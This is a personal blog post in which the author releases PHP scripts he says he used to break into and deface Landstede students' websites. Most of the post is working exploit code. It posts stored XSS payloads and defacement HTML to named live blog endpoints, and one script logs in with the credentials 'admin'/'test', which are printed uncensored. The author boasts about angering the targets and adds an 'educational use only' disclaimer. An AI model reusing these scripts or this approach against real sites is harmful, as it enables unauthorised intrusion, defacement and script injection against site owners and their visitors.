Exploit codes used against Landstede
This post was last modified over a year ago and as such, information in it may be outdated (or the post may be outright broken).
Hey G33ks,
So, the storm has settled down between the skrubs from Landstede and me.
So I felt it was safe enough to release the exploit codes :)
It were a total of 3 exploits.
All the exploit codes below are 100% how I used them, all URLs, usernames, password etc. are 100% uncensored!
Please note that the exploits *should* have been patched (which gives them 0 reason to complain against me for publishing it) since it's about 3-4 months ago at the time of writing.
Well, here you go:
Disclaimer
This post is intended for educational use only.
I am in no way or shape responsible for any damages done!
Please make sure you made adequate preperations before proceeding.
This post is intended for educational use only.
I am in no way or shape responsible for any damages done!
Please make sure you made adequate preperations before proceeding.
Exploit 1 - April 24 2017
Authentication is a luxury?
<?php
� /*
�� * Exploit by FinlayDaG33k
�� * https://aberg.newdeveloper.nl/pages/blog.php
�� *
�� * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
�� * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
�� * As long as you retain this notice you can do whatever you want with this stuff.
�� * If we meet some day, you should buy me a drink.
�� * Hugs are mandatory when meeting me!
�� * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
�� */
� // Build our message
� $message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
� $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
� // Initialize our Curl instance
� $ch = curl_init();
� // Set some options
� curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
� curl_setopt($ch, CURLOPT_POST, 1);
� curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
� // Add our message to the POST body
� curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
� // Execute the request
� // Then end the script
� curl_exec ($ch);
� curl_close ($ch);
� echo "Exploit send!"; Exploit 2 - May 1 2017
Using username `admin` and password `test` is generally not a good idea on a website facing the whole world...
<?php
� /*
�� * Exploit by FinlayDaG33k
�� * https://aberg.newdeveloper.nl/pages/blog.php
�� *
�� * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
�� * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
�� * As long as you retain this notice you can do whatever you want with this stuff.
�� * If we meet some day, you should buy me a drink.
�� * Hugs are mandatory when meeting me!
�� * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
�� */
� // Build our message
� $message = urlencode('<h1>Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1>');
� $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
� // Initialize our Curl request
� $ch = curl_init();
� // Set some options
� curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/admin.php");
� curl_setopt($ch, CURLOPT_POST, 1);
� curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
� curl_setopt($ch, CURLOPT_VERBOSE, true);
� curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
� curl_setopt($ch, CURLOPT_TIMEOUT, 10);
� curl_setopt($ch, CURLOPT_HEADER, true);
� // Use memory for our cookie
� curl_setopt($ch, CURLOPT_COOKIEFILE, '-');
� // Set the username and password
� curl_setopt($ch, CURLOPT_POSTFIELDS,"user=admin&password=test");
� // Add our headers
� curl_setopt($ch, CURLOPT_HTTPHEADER, array(
��� 'Host: aberg.newdeveloper.nl',
��� 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0.2) Gecko/20100101 Firefox/6.0.2',
��� 'Accept: */*',
��� 'Accept-Language: en-us,en;q=0.5',
��� 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
��� 'Connection: keep-alive'
� ));
� // Authenticate outselves
� $result = curl_exec ($ch);
� // Get our response headers
� $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
� $header = substr($result, 0, $header_size);
� // Set a new url option
� curl_setopt($ch, CURLOPT_URL,"https://aberg.newdeveloper.nl/pages/blog.php");
� // Post our own message
� curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
� curl_exec ($ch);
� // Clean up
� curl_close ($ch);
� echo "Exploit send!"; Exploit 3 - May 4 2017
This guy trashtalked that I wouldn't be able to exploit his site, well, it worked anyways (hint: he got pissed) :)
<?php
� /*
�� * Exploit by FinlayDaG33k
�� * https://cschotman.newdeveloper.nl/pages/blog.php
�� *
�� * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
�� * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
�� * As long as you retain this notice you can do whatever you want with this stuff.
�� * If we meet some day, you should buy me a drink.
�� * Hugs are mandatory when meeting me!
�� * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
�� */
� // Build our message
� $message = urlencode('This exploit is written on April the 24rd 2017 with ID "FDG-2017-00003".');
� $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
�
� // Build some POST data
� $postdata = urlencode('send_post=HUEHUEHUE&new_title=Blog exploit By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a>&new_post='.$message);
� // Initialize a new Curl instance
� $ch = curl_init();
� // Set some options
� curl_setopt($ch, CURLOPT_URL,"https://cschotman.newdeveloper.nl/blog/new_post.php");
� curl_setopt($ch, CURLOPT_POST, 1);
� curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
� curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
� // Add our POST data
� curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);
� // Send the request
� // Then close our handler
� $result = curl_exec($ch);
� curl_close ($ch);
� // Dump the result
� print_r($result); Exploit 5 - May 4 2017 (same as Exploit #1, but against different target)
How was this one even possible?
I already exploited a site using the same mistake...
This one got them really mad btw :mrgreen:
<?php
� /*
�� * Exploit by FinlayDaG33k
�� * https://pmetz.newdeveloper.nl/pages/blog.php
�� *
�� * "THE FINLAYDAG33K LICENSE" (Revision 2), Based on the "BEERWARE LICENSE":
�� * <Aroop "FinlayDaG33k" Roelofs> wrote this file.
�� * As long as you retain this notice you can do whatever you want with this stuff.
�� * If we meet some day, you should buy me a drink.
�� * Hugs are mandatory when meeting me!
�� * Aroop "FinlayDaG33k" Roelofs Can NOT be held liable for any damages done!
�� */
� �
�� // Build our message
�� $message = urlencode('<h1>Exploited By <a href="https://www.finlaydag33k.nl" target="_blank">FinlayDaG33k</a></h1><hr>');
�� $message .= urlencode('<br />XSS Test (see HTML Source): <script>alert("Exploited by FinlayDaG33k");</script>');
�� // Initialize a Curl instance
�� $ch = curl_init();
�� // Set some options
�� curl_setopt($ch, CURLOPT_URL,"https://pmetz.newdeveloper.nl/pages/blog.php ");
�� curl_setopt($ch, CURLOPT_POST, 1);
�� curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
�� // Add our message
�� curl_setopt($ch, CURLOPT_POSTFIELDS,"item=".$message);
�� // Execute the request
�� // Then clean up
�� curl_exec ($ch);
�� curl_close ($ch);
�� echo "Exploit send!"; Well, there ya have it :)
If they dare to open their mouths against me again, then we can be sure that they don't give a damn about security.
But for now...
[g33kout]
Comments
Leave a comment
Please login to leave comment!